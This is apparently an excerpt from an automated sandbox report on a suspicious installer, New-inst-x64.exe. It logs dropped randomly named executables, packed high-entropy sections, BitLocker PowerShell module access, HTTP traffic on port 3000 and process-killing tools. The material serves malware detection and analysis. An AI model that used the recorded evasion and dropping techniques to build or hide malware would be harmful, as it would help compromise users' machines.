      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C358F8 push esi; ret 0_3_09C358FA
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C358FD push edi; ret 0_3_09C358FE
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C3609B pushad ; ret 0_3_09C3609E
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C3609F pushad ; ret 0_3_09C360A2
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C36071 pushad ; ret 0_3_09C3609A
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C26077 pushad ; retn 0009h0_3_09C2608E
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C36875 push 68C409C3h; ret 0_3_09C36896
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C35800 push esi; ret 0_3_09C35802
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name: entropy: 7.985393389809318
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name: entropy: 7.914561090197707
      Source: vbczvzznbmunxtn.exe.0.drStatic PE information: section name: .text entropy: 7.09207256696417
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeJump to dropped file
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exeJump to dropped file
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exeJump to dropped file
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 3000
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 3000
      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49721
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
